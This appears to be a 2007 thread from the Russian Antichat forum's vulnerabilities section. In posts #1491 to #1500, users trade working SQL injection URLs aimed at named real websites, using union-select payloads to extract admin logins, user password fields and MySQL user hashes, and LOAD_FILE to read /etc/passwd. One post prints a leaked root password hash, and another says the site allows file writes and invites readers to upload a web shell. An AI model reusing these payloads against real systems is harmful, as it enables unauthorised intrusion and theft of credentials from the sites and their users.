ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1491  
Старый 31.03.2007, 16:45
Аватар для XTErner
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию

shoping
Код:
http://www.oktava-shop.com/view_prod.php?id=-89+union+select+1,login,3,4,5,6,7,8,9,10,11,12,13,14+from+admin/*
Код:
http://www.poker-shop.ch/produit_info.php?id=-8+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16+from+INFORMATION_SCHEMA.TABLES+limit+29,1/*
Код:
http://www.poker-shop.ch/produit_info.php?id=-8+union+select+1,2,3,LOAD_FILE(0x2f6574632f706173737764),5,6,7,8,9,10,11,12,13,14,15,16/*

Последний раз редактировалось XTErner; 31.03.2007 в 16:47..
 
Ответить с цитированием

  #1492  
Старый 31.03.2007, 17:49
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://www.bukvite.com/poem.php?docid=-1+union+select+1,2,3,4,concat(database(),char(58),user(),char(58),version()),6,7,8,9,10,11,12/*
 
Ответить с цитированием

  #1493  
Старый 31.03.2007, 19:01
Аватар для kamaz
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

Цитата:
http://www.radiookapi.net/article.php?id=7093%20union%20select%201,id,3,4,5, 6,7,8,9,0,11,12,131,14,15,16,17,18,19,concat(login ,char(58),password)%20from%20radiookapi001.user/*
Цитата:
http://www.radiookapi.net/article.php?id=7093%20union%20select%201,id,3,4,5, 6,7,8,9,0,11,12,131,14,15,16,17,18,19,concat(login ,char(58),email,char(58),passwd)%20from%20radiooka pi002.user/*
____
 
Ответить с цитированием

  #1494  
Старый 31.03.2007, 19:32
Аватар для Isis
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

Ейск - город герой
Код:
http://www.yeisk.ru/catalog/_jump.cfm?ID=93'
 
Ответить с цитированием

  #1495  
Старый 31.03.2007, 19:35
Аватар для Joker-jar
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659

Репутация: 646


Отправить сообщение для Joker-jar с помощью ICQ
По умолчанию

Код:
http://metromir.ru/weather.php?cityid=1'+union+select+version()/*
Полазьте поглубже, у кого есть время...
 
Ответить с цитированием

  #1496  
Старый 31.03.2007, 19:39
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

Цитата:
Сообщение от Joker-jar  
Код:
http://metromir.ru/weather.php?cityid=1'+union+select+version()/*
Полазьте поглубже, у кого есть время...
для начала:
Код:
http://metromir.ru/weather.php?cityid=1'+union+select+concat(user,0x3a,password)+from+mysql.user/*
root:447a27ec3f4a0108
 
Ответить с цитированием

  #1497  
Старый 31.03.2007, 20:02
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://autoonline.com.ua/news/index.php?id=-1+union+select+1,2,3,4,5,concat(database(),char(58),user(),char(58),version()),7,8,9/*
http://autoonline.com.ua/news/index.php?id=-1+union+select+1,2,3,4,5,concat(firma,char(58),kname,char(58),tel,char(58),mail),7,8,9+from+mail+limit+0,1/*
Код:
http://www.informatics.ru/viewproblem.php?problem_id=101&round_id=-1+union+select+1,2,database(),version(),5,6,7,8,concat(user,char(58),password),10+from+mysql.user/*
 
Ответить с цитированием

  #1498  
Старый 31.03.2007, 20:12
Аватар для Joker-jar
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659

Репутация: 646


Отправить сообщение для Joker-jar с помощью ICQ
По умолчанию

Код:
http://e-catalog.rusbiz.ru/1'.html
Горе mod-rewrite'еры...
 
Ответить с цитированием

  #1499  
Старый 31.03.2007, 20:14
Аватар для }{0TT@БЬ)Ч
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

хз выкладывал кто нет,полностью раздроченная скуля
Код:
http://www.kalinka.ru/reports/?show_photo=-52+union+select+1,2,3,4,5,6/*
так же есть права на чтение и запись, но чтение осложнялось тем что вывод ограничен в несколько символов смотреть конфиги через substring например мой мозк просто не выдержал,поэтому был найден методом тыка путь /home/www/htdocs/ ,думаю папку для заливки шелла сами найдете юзайте на здоровье.
 
Ответить с цитированием

  #1500  
Старый 31.03.2007, 20:20
Аватар для maxster
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631

Репутация: 380
Отправить сообщение для maxster с помощью ICQ
По умолчанию

Код:
http://radio.localka.ru/jazz/songinfo.php?song_id=-264+union+select+1,2,pw,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,0x697427732061646d696e,24,25,26,27,user,29,30+from+users/*
c помощью лимита можно крутить
Код:
http://radio.localka.ru/jazz/songinfo.php?song_id=-264+union+select+1,2,mysql.user.password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,0x4d7953514c2070617373,24,25,26,27,user,29,30+from+mysql.user/*
пасс от базы(не разломал)

Код:
http://radio.localka.ru/jazz/songinfo.php?song_id=-264+union+select+1,2,LOAD_FILE(0x2f6574632f706173737764),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,0x2f6574632f706173737764,29,30/*
/etc/passwd

Последний раз редактировалось maxster; 31.03.2007 в 20:30..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ